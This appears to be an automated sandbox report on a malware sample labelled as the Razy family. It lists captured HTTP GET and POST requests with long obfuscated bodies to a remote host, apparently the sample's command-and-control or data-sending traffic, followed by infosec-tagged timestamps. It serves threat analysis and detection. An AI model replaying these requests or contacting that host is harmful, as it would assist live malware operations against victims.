bwAu0On59Zdw6rRz1UEHPHydnk8D7N7erial74FnFgC6K7YZ1rFzEPy-t_nXrY6gJ-hK1a~oWp5lA7W2qMSkL2cwt9txz69TANDgYv~UfvDqlrBrZWloruVhD6hsIXKhongxJje7FXI26FetH-6ZhAV8smvY6TA90L05c_jiPTLPlY0cfWXzFI5jwcNvsJft(tAt35jM9hYuEVxpVeAsF18N2Gv2NPI9CY7Ec4IpfbgtkOSLwCeGkSsyXf8TSS5RchDYZKcbulnt8pcxvUddiC2sFD7ohyNhilT7LVnq6ewkQMWDPB7Jy5Y-xOQrqgj25xFxWMMnApWPtycnNSdCM2~h2bTZCZthFS(pTIwzJFEF2jl1fXxTKzXUfEIctMng~FoVyfpeXsMA9JKNBwsuqY9zP-CVL_krLHxBBa1qFSH
http://www.resourceonbench.com/ga/?ETUTzJu=0R3c8C8bGa5AtKYbifh1nbehrtLKQQx7GrR/2s9C+Nqh34VcKzzMvkn0+leQ2vR1YrxENmwj&DxoHW=VDKPcDdPwnEd1V
- Hostname: www.resourceonbench.com
- IP Address: 69.90.66.250
- Port: 80
- Count: 1
GET /ga/?ETUTzJu=0R3c8C8bGa5AtKYbifh1nbehrtLKQQx7GrR/2s9C+Nqh34VcKzzMvkn0+leQ2vR1YrxENmwj&DxoHW=VDKPcDdPwnEd1V HTTP/1.1 Host: www.resourceonbench.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.resourceonbench.com/ga/
- Hostname: www.resourceonbench.com
- IP Address: 69.90.66.250
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.resourceonbench.com Connection: close Content-Length: 2201 Cache-Control: no-cache Origin: http://www.resourceonbench.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.resourceonbench.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate ETUTzJu=8z7minhAU7NytvwrmoQr3OWp(uXBXQg4SuY9rZQB55CdxdhmGUX5(xP3zFe4o8dIJJFcEQBmu1qAnb3y7gaWswp_M7OB4LunMsDwo3BVSuBKXRVjBu4KRymnN_BG9vVAsMbigLNLJHFe2_dnCfPIZfOxHbxe8CxqRI1dGF~7l-sgVZL2VOmYqP84xYKGfbpfDWxSylOp4v6PiawkSZGfyfCnxc7gA53I238gn3B7tNG5WP3-X8bMRAlErdFeW0T75HL8QALHbRQSQHEcj_jCGwCFqqRtVvm3hDrbDCTfYMiczbFlxVBEujiglfp8UoW7TLpQsabmZZ7qgD20vtXsBg8vQMI6p_bfieAsmIkHGhMuUpKCQgPLxNOPLmSki4Z8KeRMrZWHvJGz01yKhRzQ4WggEQdHdzYRJNviY7pAGl2NYuvtnAMazRldGUxf4XhXl2tP61V5D6Blws6BFT6noxScj7EncSx8248ZBWkG6QBLY4MdoSFdZyyV7ZLfZx~8CJ7BPYtflv(l7YT1Ivdksihxy4CdCgnZ3r6VXkqVVxzsM3ZJ(ic6(64WHO6R9yT9BClQ4hfpl_dQGffaLwqywPKB(0dSIBx7sWs_i3Yyoc9LrY~k0LquRzUxVRnSs2S3UqEFc-L7zLQebmhYa-5I(CQr9aCxHZ~Vefk5kEKEb7xR0ar7Dw1zIoQ2rZOjVKNwxFTXQLQkPfYJxXPA3fGE3e3UXsV8VFqCB6H9mIcKVMHZWvLdrzoMVbG5nAtzMPYC4490RP1MqNvlNPWaqddnUTZYvKrnmWQEkhzpNqzQtxv3v0J4Ynu_l3SkO29siNo7Pe~jys(V8JbwjAolIwwBqn70spRln-~YkHDRKpTUUSu4Ne5NaVW8ZQYLcHp_63rVPWbEOHMM(OabGZ6XU6PcrmHjQm5_epu7imWJgw85GwN3SqFVhRFnS2mXTyBJkQMIJcOteT6XkFkIEY2stP~492xHdi33aAWcFZprkHNM5IaaQ9S0sgNqEz4xvvRwRL~om6ZiIzFjPcdnlLN5~4WlwYdyAZqhr6w-ErRCGLPAqmxG7KHFCIyrhUy0tQdU9tDd9wv7xPqL84mwYKsEBCNKJm0D8dqm5kEHAmRj8KDKT9OImb8DMuikfEugrdjn~rBVD3kAMz1R5zeMqc6K0_WmzUp8xtr9pcOzBzG2okrFb6peaRwzyOhIr18vhE2hcJnsKB41y8E45gBKW5Sxv3IDGouhMDEJGnVMdIdIpr~28sbF7FA91O2GVJ4v0ZGk6_(i9ij9fcPgl-KAlYa2Hp4ksAyTSKkHkBv_CiVMsp34V0oUOOle4XMh8Lz1~b0ZsJ6nzL5vjZC6NosNGJPYRFSJQiquEHpBZ_ygMsSJdxiuN7KZveCPVvfCbdgcbFL3PL2uwmYFm8gSqqkwW0522VI4NlTWuJXGK7Kx7kDK(yLwvi76mq7IDo~0EEwnLouzwDsWWSgAbgGz5Vl9whC7rJrCyhvuaKeLJ2hqlGKF5Qk9TLjorDLPargYs0fG(QBrb-wzGSANVRKi0qSwqLxcXb7DiEQ7LRdUUKueW2hLQnE1Ieh1LvDRO4VrJicKgVt0Q3LO(d8MdpQZj8gptKUv67QE7U6sxTrr16LYW1D5fElSNbuMKuuqVa4EQukb28fdtADu5g4F2xjxynOIOGUIcE5HSUkPZIZ9E8aWq60qNVs1Of4ojoePxWd6jwDYVjxSBXuva2afd9mqqPbCIBKiSStkMrHiTquA~bLC8J6ZA0ffEYZ3YiIIwPFN5Dm-mWctxDiaQrrDF0OZr6~4HIbJfI30tC7-qOMm3_ZK7c82S9jdfUeJXYVULwafpf5jBSoekeiRHSB0dJt-SFsYThEzEkYhVBpGf77o8gSPeaOHcAf5fM7mxdojLQQt9IFnT4NWkrNGlKIu1q7INYnwFsRsBHufvNV5o8vc~KlGalgpmM7I6eqMOPdSJqUXm6qbEyOU9OcIbF3QqNOl8Jc88cdYHjSR2dYGF5IqLVpwQAjhqUKprAKIU8DSV7JCPRWa7HQYB-WATlhbMOxj5LVZDXwoRIDwix9COr4iql4Q8-LDTPA84JUaWc0n4ZPtcyd3BZ6j6XgBfrWWfa6qZJWrqdnpctMFMbvg2tXbxRNPHzZ-ld0qp2fdHyg98_h4Yb2yuX93X_cUcO7_RmaY8llw\x00\x00\x00\x00\x00\x00\x00\x00
http://www.resourceonbench.com/ga/
- Hostname: www.resourceonbench.com
- IP Address: 69.90.66.250
- Port: 80
- Count: 1
POST /ga/ HTTP/1.1 Host: www.resourceonbench.com Connection: close Content-Length: 57185 Cache-Control: no-cache Origin: http://www.resourceonbench.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.resourceonbench.com/ga/ Accept-Language: en-US Accept-Encoding: gzip, deflate ETUTzJu=8z7miiV-Hoh469o6iqpu5Pm9nt7HeihMbe5srZBp(8eL19xmASj-7RP26lfuicRwA6FqERVMu0~Dsfz36GOFzQsEO7aUq4GkCu~vjWJVWf1II0IxHf04OCKpFeZLqtMmso(u26tze38S4-dPD57-XPa-I6lUyBV-ctBVaWOopbE6EbCLVMKLyfsv5_uXWK5lQBJSxWfuzNyN8t88RIHv0uzDwdrnKN7P7Vl-p21Qhpa1e4KJa8f5TRV5m8cZRnni4FfkPx2zcjcGb180kfXaFEHYnMRtasu1mG(DNCT8aM6uorFNxVEH00KsmfpyL7ykZLQX3qL2L6zqilyB4evjPA8wMoVjsIjiieQjn4cHHnUuRJaBDwPLodONLmTpi4ZVKYtIqZeH~56x1HXLmCv0mGgkHS4GZyk9JOv6YaBAFUiCTqrXv1gV5w9rI05P4XtOmzxTsgs9C6Bm4_faBXu7skWx~s4cPy0n2YpZBxoK7XJfQYxougJnaHOE(YzHXhTATYf3Ypgm0-Wr8r6aMLklvjtO6fzYHlv2muesV0OBdSHwB3Fe4Uc2voZaPc2TrH(4H0xbwwmj2PhECt6iISWM3dj620BvXxZZlU8Pow0TrPJ2vrfn462NURcLcXnc7kO-N_4DYcz2gZI3XVR-Hqh8iVlW8J2TEYXHBORRgijUM8IhxLvjOBJPPPEQ8vTKVoMbzlqlYJQtNudx2jn8yoOvytm8acFkV3CrB6(Hn5oKHNjZSuLCqQwBfrGgpgtVT_VX46MvWPhMv6rnMMuq760bMzYb8LnoxmxyknCqf7Pq7Dv0qwExZnv3kX~XIx10994BPur9oI2YtbzgmTAkDx0G8mbasJd3ovy_vlXLPaL6ADm8Ces4W3nxGDgaF2wrpSSfDGqGYnpwn4nXOMu1a-axpnrYVlBed6nco2es6RJYVmdbJboMmVc6XkGQSCpdi08uLuKiSye7i2JWDaCUpOqR6n4jcCzjTlyVceVyoQht6b63TcqYlCJRKR5QpM9KXqmizYEZAgMDNNJSnYsCmfu4h-4fBJmXo7k7aL5pB5P15Vc2(8mQcqmTk3SWqFNp1vjNg3z69cKs(cDbRrpxLCpic0ki~Ny99n8zAklJ9vrKSt2I3bcDFKqdBlSyru2CzYdSTkQGchcB4gmB4sGToeue2ChCgvnOj9bjCDOUuSiqb8Neb2oM3uNhq0g8ik(jcdTBASd0qf4F~V9cdavKjW88SLP9NyYiUnFBWLZCquKD883VoWANk4jsX5924NCY4_q6mBqhQM7nqMyc8b20QrksiCi5LbcSvHX3HS9PivzbFD1jBshp(DI3~YXY(KUGiqXK28JI2pm4XJ4vIILEZhe1bgfeewRhG5DXVM2IdSy_PqWC0_HXZcvlb5UReUrZCcGeiE0whJ0vx7QeJk8-mlxwZlObisPeeuiGiUP2z3jItxLQ2ojFF7eeBEwMSpGn4BMWWRQEWj7r5i93w1Wou_Wi6FzjIYGjK39gugmezigdVsmplE3pT6YQ7lvWyw84K8cyWGhiQgSz2ayYh41cSqb-oh8TESdYLL(9BEh5Vmk9IdE9LMDOU4hsFiQts3Veb2u409EJYc0xsNoLxIsvyqMAx2C4yRvb09(cFwzQb3J8OtKYfsbzEO02ScId8_fN61Hr9g0xzRu9oVSMLUMHWE1saRIhb4YsL4mrsK5lNVUYIMAvjtaQuCFxiCTCAyh7AWPQeUqnS-~2ztaDRTDUQSc6SKDKWoaI~5jw9urmRkzkGt1hLBE2(dd-6wjCnk9t3xSGEKm5PhyOp9Oaf4nIeNqsniX5n_k3lqJe4cEsHMjrU32QdOZqIw2c~f1hLTxEsNmOOHF8PZdzfR8YByMoNklmDSZqVfbXyxTnNeu9JXyRet60l8gqLQ4d1YESDK9kweZn9cR19OrmCprdGvJqB3mf2Yca59X9uYIgAyc1vMy275KJHtdcfJg_iqvBECnE4Pg3Tn7dvPiBz7I968JOGivTjsRjHYUCLR1jVCWDtkXC3EHUSOfYUvIuASquyQU0ef64NQZqNf1D~KxsN2gVBYnzlmgKOZhS52BD8fXZLcwajfEpKdMQ15XtFgBmGPOcgVAZac21cq~_XMmkrerVadQiDLb_zqb5mhBTMm1Xj44t7G(AIxI7hOhaDp21vhphMZcZXtiUNXS9~FMb(z2yQo~Iw9unDrgH3Y6JUYRN2nEwx6nd4xripXEClk4fqDgAbqpK1kyGVdqC02Pz1r5_q60f(bmFfKM8c9hhdkb4cDjf2b4P(tZkTlU5hpiU5EzkeGU5jhMo8kq7lQ8kSpJelFmjEZJYPStA(S1eFvdbwgTMSopjDmnPx4TyTCL4gBTJ4r036MGS2fgt1h7b3fiKXo795RQ1
Detected family: #Razy
TheSystem Itself @ 2018-09-09 19:54:03
#infosec #automation
TheSystem Itself @ 2018-09-09 19:36:22